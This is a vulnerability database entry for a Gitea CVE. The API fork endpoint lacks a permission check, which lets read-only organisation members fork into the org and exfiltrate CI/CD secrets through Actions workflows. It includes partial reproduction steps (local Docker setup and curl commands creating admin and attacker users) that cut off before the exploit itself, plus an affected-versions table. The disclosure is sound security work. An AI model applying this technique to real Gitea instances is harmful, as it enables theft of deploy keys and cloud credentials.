cbcvebase.
CVE-2026-22555
published 2026-06-17

CVE-2026-22555: Gitea: API Fork Missing CanCreateOrgRepo Check Allows Org Secret Exfiltration ## Summary The API endpoint `POST /api/v1/repos/{owner}/{repo}/forks` only checks…

high
Gitea: API Fork Missing CanCreateOrgRepo Check Allows Org Secret Exfiltration

## Summary

The API endpoint `POST /api/v1/repos/{owner}/{repo}/forks` only checks `IsOrgMember()` when a user forks a repository into an organization, but does not check `CanCreateOrgRepo()`. The web UI fork handler correctly checks both. This allows a read-only organization member — in a team with `can_create_org_repo=false` — to create repositories in the organization namespace via the API. The attacker receives full admin permissions on the forked repository, can enable Actions, push arbitrary workflow files, and exfiltrate all organization-level CI/CD secrets (deploy keys, cloud credentials, API tokens) through the runner infrastructure.

## Steps To Reproduce

### 1. Environment setup

Start a Gitea instance with Actions enabled:

```bash
# docker-compose.yml
cat > docker-compose.yml << 'EOF'
version: '3'
services:
gitea:
image: gitea/gitea:1.23
container_name: gitea-poc
ports:
- "3000:3000"
volumes:
- gitea-data:/data
environment:
- GITEA__database__DB_TYPE=sqlite3
- GITEA__server__ROOT_URL=http://localhost:3000/
- GITEA__security__INSTALL_LOCK=true
- GITEA__actions__ENABLED=true
volumes:
gitea-data:
EOF

docker compose up -d
# Wait for startup
sleep 15

# Create admin user
docker exec -u git gitea-poc gitea admin user create \
--admin --username admin --password 'Admin1234!' \
--email [email protected] --must-change-password=false
```

### 2. Create the target environment (as admin)

```bash
# Get admin token
ADMIN_TOKEN=$(curl -s -X POST "http://localhost:3000/api/v1/users/admin/tokens" \
-u "admin:Admin1234!" -H "Content-Type: application/json" \
-d '{"name": "setup", "scopes": ["all"]}' | python3 -c "import sys,json; print(json.load(sys.stdin)['sha1'])")

# Create attacker user
curl -s -X POST "http://localhost:3000/api/v1/admin/users" \
-H "Authorization: token $ADMIN_TOKEN" -H "Content-Type: application/json" \
-d '{"username":"attacker","password":"Attacker123!","email":"att

Affected

1 ranges
VendorProductVersion rangeFixed in
code.gitea.iogitea>= 0 < 1.26.01.26.0
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.